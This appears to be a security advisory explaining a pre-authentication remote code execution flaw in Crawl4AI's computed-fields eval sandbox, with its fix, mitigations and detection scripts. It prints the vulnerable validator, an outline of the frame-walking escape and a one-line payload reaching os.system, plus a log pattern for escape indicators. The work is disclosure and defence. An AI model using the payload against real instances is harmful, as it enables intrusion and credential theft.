Crawl4AI CVE-2026-53753 (CVSS 9.8): Pre-Auth RCE via AST Sandbox Escape

Thu, 25 Jun 2026 00:00:00 +0000

Every Crawl4AI instance running version 0.8.6 or earlier with its default configuration is remotely exploitable without authentication. A single POST /crawl request carrying a crafted JsonCssExtractionStrategy schema is enough to escape the AST-based expression sandbox and execute arbitrary system commands inside the Docker container. The attacker needs no credentials, no prior access, and no user interaction. CVE-2026-53753 carries a CVSS score of 9.8 because the attack vector is network-based, the complexity is low, and the impact on confidentiality, integrity, and availability is high. The root cause is a three-line flaw in the _safe_eval_expression() function. Its AST validator blocks only attribute names that start with an underscore. That misses Python introspection attributes like gi_frame, f_back, and f_builtins, which expose the full interpreter to anyone who knows how to walk from a generator to its execution frames.

Crawl4AI’s Computed Fields Feature

Crawl4AI is an open-source, LLM-friendly web crawler and scraper, broadly comparable to Firecrawl and typically self-hosted in Docker. It lets you define extraction schemas that describe how to parse crawled pages. One feature, computed fields, lets users specify Python expressions that transform extracted data inline. When you define a schema like this:

```python
schema = {
  "name": "MyExtractionStrategy",
  "type": "json-css",
  "params": {
    "computed_fields": {
      "total": "price * quantity"
    }
  }
}
```

Crawl4AI evaluates the total expression at extraction time using _safe_eval_expression(). This function parses the expression into an AST and walks the tree. It rejects any attribute access whose name starts with _, and it allows direct function calls only to an allowlist of builtins. The intent was to prevent access to Python internals like __class__, __subclasses__, and __builtins__, which are the usual building blocks of Python jail escapes.

The approach worked against naive payloads. You couldn’t write ().__class__.__base__.__subclasses__() because __class__ starts with an underscore. But the security model assumed that the only dangerous attributes in Python are the ones whose names start with an underscore. That assumption was wrong.

The Root Cause: Blocking Underscores Is Not Enough

Here is the actual vulnerable function as it existed in Crawl4AI <= 0.8.6:

```python
# Vulnerable: Crawl4AI <= 0.8.6
import ast

_SAFE_EVAL_BUILTINS = ["str", "int", "float", "bool", "len", "abs",
                       "min", "max", "sum", "round", "range", "sorted",
                       "reversed", "enumerate", "zip", "map", "filter",
                       "type", "isinstance", "issubclass", "hasattr",
                       "getattr", "setattr", "dict", "list", "tuple",
                       "set", "frozenset", "True", "False", "None"]

def _safe_eval_expression(expression, context):
    tree = ast.parse(expression, mode="eval")

    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute):
            # Block only underscore-prefixed attributes; names such as
            # gi_frame, f_back and f_builtins pass this check untouched
            if node.attr.startswith("_"):
                raise ValueError(f"Access to attribute '{node.attr}' is not allowed")
        if isinstance(node, ast.Call):
            # Only calls by bare name are checked against the allowlist;
            # method calls on attributes (obj.method()) are not inspected
            if isinstance(node.func, ast.Name):
                if node.func.id not in _SAFE_EVAL_BUILTINS:
                    raise ValueError(f"Call to '{node.func.id}' is not allowed")

    code = compile(tree, "", "eval")
    # Second layer: the evaluated expression's globals get an empty builtins dict
    return eval(code, {"__builtins__": {}}, context)
```

The AST walker blocks __class__, __subclasses__, __builtins__ — anything with a leading underscore. It then passes an empty __builtins__ dict to eval() as a second layer of defense. Two layers, both relying on the same flawed assumption: that dangerous Python internals always have dunder names.

Python’s generator and frame object attributes tell a different story:

| Attribute | Object | Starts with `_`? | What it exposes |
| --- | --- | --- | --- |
| `gi_frame` | generator | No | Current execution frame of a suspended generator |
| `f_back` | frame | No | Previous frame in the call stack |
| `f_builtins` | frame | No | The real `__builtins__` dict of that frame |

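None of these start with an underscore, so they pass the AST validator without triggering any check. The eval() call sets __builtins__ to {}, but that restricts only the evaluated expression’s own globals. Frames further up the call stack belong to the Crawl4AI code that called eval(), and they still carry the original, unrestricted builtins in f_builtins.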
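A quick way to see the gap is to list the public (non-underscore) attributes of a generator and its frame. You can then run attribute chains built from those names through a copy of the underscore-only rule. The sketch below reimplements just that one check under a hypothetical name, passes_underscore_check(). It parses the expressions but never evaluates them.

```python
import ast


def passes_underscore_check(expression: str) -> bool:
    """Hypothetical helper: apply only the vulnerable validator's attribute rule.

    Returns True if no attribute name in the expression starts with "_".
    The expression is parsed, never evaluated.
    """
    tree = ast.parse(expression, mode="eval")
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute) and node.attr.startswith("_"):
            return False
    return True


def demo_gen():
    yield


gen = demo_gen()  # created but never started; it exists only to be inspected
gen_attrs = [a for a in dir(gen) if not a.startswith("_")]
frame_attrs = [a for a in dir(gen.gi_frame) if not a.startswith("_")]

print("generator attributes without '_':", gen_attrs)
print("frame attributes without '_':", frame_attrs)

for expr in ("().__class__.__base__", "g.gi_frame.f_back.f_builtins"):
    verdict = "allowed" if passes_underscore_check(expr) else "blocked"
    print(f"{expr!r}: {verdict}")
```

On CPython, both lists include the attributes from the table above. Only the dunder chain is blocked; the frame chain sails through the same rule that was supposed to stop it.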

The Exploit Chain: From Expression to Shell

The exploit requires sending a POST /crawl request with a JsonCssExtractionStrategy that includes a computed field containing a malicious expression. The expression uses a generator to access gi_frame, then walks the frame chain via f_back until it reaches a frame that still has the real f_builtins:

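```python
# Conceptual outline of the escape chain (illustrative, not a working payload;
# statements like while and assignment cannot be sent through eval mode)

# Create a generator to obtain a frame object
gen = (lambda: (yield))()
frame = gen.gi_frame

# Walk up the call stack until a frame exposes the real __builtins__
real_builtins = None
while frame:
    if "__import__" in frame.f_builtins:
        real_builtins = frame.f_builtins
        break
    frame = frame.f_back

# With the real __import__, the attacker can load os and run commands
__import__ = real_builtins["__import__"]
os = __import__("os")
os.system("id")
```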

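Because eval() in "eval" mode accepts a single expression and no statements, a real payload has to compress this chain into one expression that fits inside a computed field schema. Schematically:

```python
(lambda g: g.gi_frame.f_back.f_back.f_back.f_builtins["__import__"]("os").system("id"))((lambda: (yield))())
```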

The exact number of f_back hops depends on the call depth at evaluation time, but the pattern is consistent. Create a generator, grab gi_frame, and walk f_back until you reach a frame whose f_builtins contains __import__. Then import os and execute commands. From there, the attacker can exfiltrate environment variables and read credential files such as ~/.aws/credentials. They can also talk to the Docker API socket if it is mounted into the container, modify files, or attempt to pivot to the host.

The full attack requires no authentication because Crawl4AI’s JWT authentication is disabled by default in all versions prior to 0.8.7. If you deployed Crawl4AI following the default Docker setup and exposed port 11235, your instance has been remotely reachable and exploitable since day one.
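If you are unsure whether an instance is exposed, start with a plain TCP connection test from a machine outside your network. The minimal sketch below uses only the standard library, and port_is_open() is a hypothetical helper name. It defaults to port 11235 from the Docker setup above. A successful connection shows only that the port is reachable; it does not show that the instance is vulnerable.

```python
import socket


def port_is_open(host: str, port: int = 11235, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out (socket.timeout is an OSError)
        return False
```

For example, run `print(port_is_open("203.0.113.10"))` from outside your network, substituting your instance’s public address for the documentation placeholder IP. A True result means anyone on the internet can reach the API.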

I’ve found that this vulnerability is particularly dangerous because Crawl4AI is often deployed by LLM application teams who want to give their agents web-browsing capability. These teams are not security engineers. They run docker run -p 11235:11235 unclecode/crawl4ai:latest, the web crawler works, they move on. The instance sits on a public cloud VM with a wide-open API endpoint serving Python eval() — essentially a remote shell with extra steps.

Hardcoded JWT Secret Compounds the Problem

Suppose you did enable JWT authentication by setting CRAWL4AI_API_TOKEN. A separate vulnerability, CVE-2026-56265 (CVSS 9.3), means the default signing key was hardcoded in the source code. An attacker who knows the default key can forge valid JWTs for any user and bypass authentication entirely. Together, these two CVEs mean that every network-reachable Crawl4AI instance before 0.8.7 is exploitable regardless of its authentication settings. Either auth is off, and CVE-2026-53753 is reachable directly, or auth is bypassable, and CVE-2026-56265 unlocks the same endpoint.

How the Fix Works

Crawl4AI 0.8.7 removes eval() from the computed fields expression path entirely. Here is what changed:

Primary fix: The _safe_eval_expression() function and _SAFE_EVAL_BUILTINS are deleted. Computed field expressions that look like Python code now log a warning and return a default value instead of evaluating. Users who need post-processing must supply a Python callable as the function key in the schema — SDK-only, not available via the JSON API.
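The shape of the fix can be sketched in a few lines. The function below is hypothetical and is not Crawl4AI’s code. Its field keys (name, function, expression) are assumptions modeled on the description above. The core idea: a computed value comes only from an in-process callable, and a string expression is logged and ignored rather than evaluated.

```python
import logging
from typing import Any

logger = logging.getLogger("computed_fields_sketch")


def compute_field(field: dict, item: dict, default: Any = None) -> Any:
    """Hypothetical post-fix handler: run a callable if present, never eval() a string."""
    func = field.get("function")
    if callable(func):
        return func(item)
    if isinstance(field.get("expression"), str):
        # Old-style string expressions are no longer executed
        logger.warning("Ignoring expression for field %r; evaluation is disabled",
                       field.get("name"))
    return default


item = {"price": 2.5, "quantity": 4}
total_field = {"name": "total", "function": lambda it: it["price"] * it["quantity"]}
legacy_field = {"name": "total", "expression": "price * quantity"}

print(compute_field(total_field, item))   # 10.0
print(compute_field(legacy_field, item))  # None, plus a logged warning
```

A JSON request body can carry strings but not Python functions. That is why a callable-only design naturally confines post-processing to the SDK.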

Secondary hardening: The hook_manager sandbox — a separate code execution path for plugin hooks — was hardened to strip __builtins__, __loader__, and __spec__ from injected modules. Dangerous builtins like getattr, setattr, type, and __build_class__ were removed from the allowlist.

Tertiary defense: The /config/dump endpoint (another eval() sink) was migrated to JSON input with Pydantic validation, eliminating a secondary injection vector.

The commit that deleted _safe_eval_expression() is straightforward. It removes about 40 lines and replaces none of them with another eval-based approach. This is the right fix. AST sandboxing in Python has a long history of failures, and attempts to implement a “safe eval” by walking the AST have been bypassed again and again. The language’s object model is too rich, the frame introspection API too powerful, and the gap between “what the AST walker sees” and “what the interpreter does” too wide. The only correct fix is to not evaluate untrusted expressions at all.

Mitigation Steps

Immediate:

Upgrade to Crawl4AI 0.8.7 or later: pip install "crawl4ai>=0.8.7" (quote the requirement so the shell does not treat > as a redirect)
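If using Docker, pull the latest image with docker pull unclecode/crawl4ai:latest and recreate the container; pulling a new image does not update a container that is already running.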
If you cannot upgrade immediately, set CRAWL4AI_API_TOKEN to a strong random value and restrict network access to port 11235 via firewall rules — but note that CVE-2026-56265 means the token alone is not sufficient before 0.8.7.
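Audit your Crawl4AI instances for signs of compromise: check access logs for computed field schemas containing gi_frame, f_back, or f_builtins. Run docker logs and grep for ValueError: Access to attribute. Legitimate usage rarely triggers that error, so a hit usually means someone probed the endpoint with underscore-based payloads that the old validator did block. Treat such hits as evidence of targeting, not as proof that an escape succeeded.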
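A short standard-library script can confirm which version a given Python environment is running. This is a sketch, and parse_release() is a hypothetical helper. It compares only the numeric release segment, so a pre-release such as 0.8.7rc1 is treated as 0.8.7; use packaging.version if you need exact PEP 440 semantics. For Docker deployments, run it inside the container (for example via docker exec) rather than on the host.

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIXED_RELEASE = (0, 8, 7)  # first release containing the fix, per this advisory


def parse_release(v: str) -> tuple:
    """Hypothetical helper: '0.8.6' -> (0, 8, 6); ignores any suffix after the numbers."""
    match = re.match(r"\d+(?:\.\d+)*", v)
    if match is None:
        raise ValueError(f"unrecognised version string: {v!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_patched(v: str) -> bool:
    return parse_release(v) >= FIXED_RELEASE


def report() -> str:
    try:
        installed = version("crawl4ai")
    except PackageNotFoundError:
        return "crawl4ai is not installed in this environment"
    status = "patched" if is_patched(installed) else "VULNERABLE, upgrade to >= 0.8.7"
    return f"crawl4ai {installed}: {status}"


if __name__ == "__main__":
    print(report())
```

Tuple comparison handles multi-digit components correctly (0.10.0 sorts after 0.8.7), which a plain string comparison would get wrong.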

Architectural:

Do not expose Crawl4AI’s API port to the public internet. Place it behind an authenticating reverse proxy (nginx with basic auth, or a Cloudflare Access tunnel).
Run Crawl4AI in an isolated Docker container with minimal capabilities: --cap-drop=ALL, --read-only, no docker.sock mount.
Evaluate whether you need computed fields at all. For most crawling workflows, post-processing extracted data in your application code is safer and more maintainable than inlining Python expressions in JSON schemas.
Monitor for related CVEs: CVE-2026-53754 (SSRF filter bypass via IPv6 transition forms, CVSS 7.5) and CVE-2026-53755 (SSRF via proxy_config manipulation, CVSS 8.6) affect the same release range and indicate a pattern of incomplete input validation in Crawl4AI.
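Take the computed-field example from the start of this post. Done on the application side, it is ordinary Python. This sketch assumes the extractor returns a list of dicts with price and quantity values (as numbers or numeric strings), for example after json.loads on the crawl’s extracted JSON. add_totals() is a hypothetical name.

```python
import json
from typing import Iterable


def add_totals(records: Iterable[dict]) -> list:
    """Compute 'total' in application code instead of a schema expression."""
    results = []
    for record in records:
        try:
            total = float(record["price"]) * int(record["quantity"])
        except (KeyError, TypeError, ValueError):
            total = None  # missing or non-numeric input: leave the field empty
        results.append({**record, "total": total})
    return results


extracted = json.loads('[{"price": "2.50", "quantity": "4"}, {"price": "n/a", "quantity": "1"}]')
print(add_totals(extracted))
```

The crawled page only ever supplies data here, so nothing in a schema or response can change which code runs.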

For more on sandbox escape patterns in agent tooling, see the Claude Code SOCKS5 Null-Byte Bypass analysis, which covers a similar parser-differential class in Anthropic’s agent sandbox. The broader context of agent security boundaries is covered in the AI Agent Security Tools Guide.

Why AST Sandboxes Keep Failing

This vulnerability is not Crawl4AI-specific; it is a recurring pattern in Python security. Restricted-eval and AST-based sandboxes have failed in Pillow (ImageMath.eval, CVE-2023-50447), smolagents (multiple sandbox escapes in LocalPythonExecutor), and countless CTF pyjail challenges. The fundamental problem is that Python’s runtime does not distinguish between “user code” and “system code” at the object level. A frame’s f_builtins is just a dict. A generator’s gi_frame is just a reference to a frame object. There is no protection domain, no capability system, no membrane that controls what code can access what objects. The AST walker is a static analysis pass running against a dynamic language with first-class access to its own runtime. More blocklist entries cannot fix that mismatch.

Crawl4AI’s maintainers made the correct call in 0.8.7: delete the eval path entirely, accept the feature loss, and tell users to use the SDK if they need computed fields. This is the only strategy that has proven durable in Python sandboxing.

Frequently Asked Questions

Q: Does this vulnerability affect Crawl4AI instances with authentication enabled? A: Yes. Even if you set CRAWL4AI_API_TOKEN, the default JWT signing key is hardcoded (CVE-2026-56265), enabling token forgery. The only fully mitigated configuration before 0.8.7 is one that is both authenticated and network-isolated — and even then, isolation is doing the heavy lifting.

Q: Can I detect if my Crawl4AI instance has been compromised? A: Check access logs for POST /crawl requests with unusually long or complex computed_fields entries. Look for generator syntax (lambda: (yield)), attribute chains (gi_frame, f_back), or string patterns resembling Python code. Also check for outbound connections from the container to unexpected destinations.
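The indicators in that answer are easy to scan for. This sketch is a simple line filter over whatever logs you have. The pattern list is an assumption drawn from the strings in this post. The filter only helps if your logging actually records request bodies, which default access logs often do not.

```python
import re
import sys
from typing import Iterable, Iterator, Tuple

# Strings associated with the escape chain and with blocked probing, as described
# in this post. Treat matches as leads for manual review, not proof of compromise.
INDICATORS = re.compile(
    r"gi_frame|f_back|f_builtins|\(yield\)|__import__|Access to attribute"
)


def suspicious_lines(lines: Iterable[str]) -> Iterator[Tuple[int, str]]:
    """Yield (line_number, line) for every line containing an indicator."""
    for lineno, line in enumerate(lines, start=1):
        if INDICATORS.search(line):
            yield lineno, line.rstrip("\n")


if __name__ == "__main__":
    # Usage: docker logs <container> > crawl4ai.log 2>&1
    #        python scan_logs.py crawl4ai.log [more.log ...]
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, line in suspicious_lines(fh):
                print(f"{path}:{lineno}: {line}")
```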

Q: Is there a workaround for computed fields after upgrading to 0.8.7? A: The function key in extraction schemas still works, but only through the Python SDK — it is not available via the JSON API. You must use the Crawl4AI SDK client and pass callables directly. The JSON API’s computed field feature is permanently removed in 0.8.7.
